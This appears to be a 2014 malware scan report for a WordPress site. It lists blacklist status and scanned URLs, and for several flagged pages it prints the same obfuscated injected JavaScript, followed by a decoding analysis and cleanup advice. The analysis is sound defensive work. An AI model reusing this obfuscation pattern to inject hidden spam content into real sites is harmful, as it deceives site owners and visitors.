Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mecuoi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mecuoi.com/
Result: The website is marked by Yandex as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mecuoi.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 21:05:23 GMT Location: http://mecuoi.com/ Server: Apache Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://mecuoi.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.3 X-W3TC-Minify: On | clean |
http://mecuoi.com/ | 200 OK Content-Length: 50655 Content-Type: text/html | malicious |
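Malicious code - confirmed by antiviruses (see below):
var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);
What the script does: it joins the numeric strings pushed into `_gw7`, reads the result three digits at a time, subtracts 70 from each value and converts it with `String.fromCharCode`, then passes the decoded text to `document.write`. The method name is assembled from the fragments "fr", "omCh", "arCo" and "de" so that it never appears literally in the source, and the `_setOption` / `_trackPageview` call names mimic a Google Analytics snippet. The decoded text is `<style type="text/css">.contentup_a{position:absolute;clip:rect(426px,auto,auto,426px);}</style>`, a CSS rule that clips the top and left 426px of any element with class `contentup_a`, which puts a small element out of view. This is typical of hidden-content (spam link) injection; the hidden markup itself is not shown in this report.
The same snippet is reported for every flagged URL in this scan (/, /popkgs.j, /popgame.j, /sample-page/), all served as text/html, while the static .js files are clean. That suggests the injection sits in a shared template or in generated page output rather than in individual script files; confirm this on the server. Searching theme files and database content for `_gw7` and `contentup_a` is a reasonable starting point. Purge the W3 Total Cache page cache after cleanup so that stale copies are not served.
Antivirus reports: (per-engine results are not included in this copy of the report)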
| ||
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/jquery-1.2.6.min.js | 200 OK Content-Length: 55774 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/jquery.idTabs.min.js | 200 OK Content-Length: 2284 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/dropdown-menu.js | 200 OK Content-Length: 669 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/js_liveclock.js | 200 OK Content-Length: 967 Content-Type: application/javascript | clean |
http://mecuoi.com/popkgs.j | 200 OK Content-Length: 39265 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://www.google.com/cse/brand?form=cse-search-box&lang=vi | 200 OK Content-Length: 2504 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21394 Content-Type: text/javascript | clean |
http://mecuoi.com/popgame.j | 200 OK Content-Length: 39266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://mecuoi.com/wp-content/plugins/wp-avim-reloaded/avimr.js | 200 OK Content-Length: 30835 Content-Type: application/javascript | clean |
http://mecuoi.com/sample-page/ | 200 OK Content-Length: 33628 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/comment-functions.js | 200 OK Content-Length: 4824 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-includes/js/tw-sack.js?ver=1.6.1 | 200 OK Content-Length: 3619 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/ajax-comment-preview.js?ver=2.01352570600 | 200 OK Content-Length: 3797 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mecuoi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 21:05:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://mecuoi.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.3
X-W3TC-Minify: On
GET / HTTP/1.1
Host: mecuoi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 21:05:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://mecuoi.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.3
X-W3TC-Minify: On
Second query (visit from search engine):
GET / HTTP/1.1
Host: mecuoi.com
Referer: http://www.google.com/search?q=mecuoi.com
Result:
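The result is similar to the first query. There are no suspicious redirects found. Only two request profiles were tested here (no Referer, and a Google search Referer). The response carries `Vary: Accept-Encoding,User-Agent`, and conditional redirects can also depend on User-Agent, cookies or client IP, so this result does not rule them out.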
GET / HTTP/1.1
Host: mecuoi.com
Referer: http://www.google.com/search?q=mecuoi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.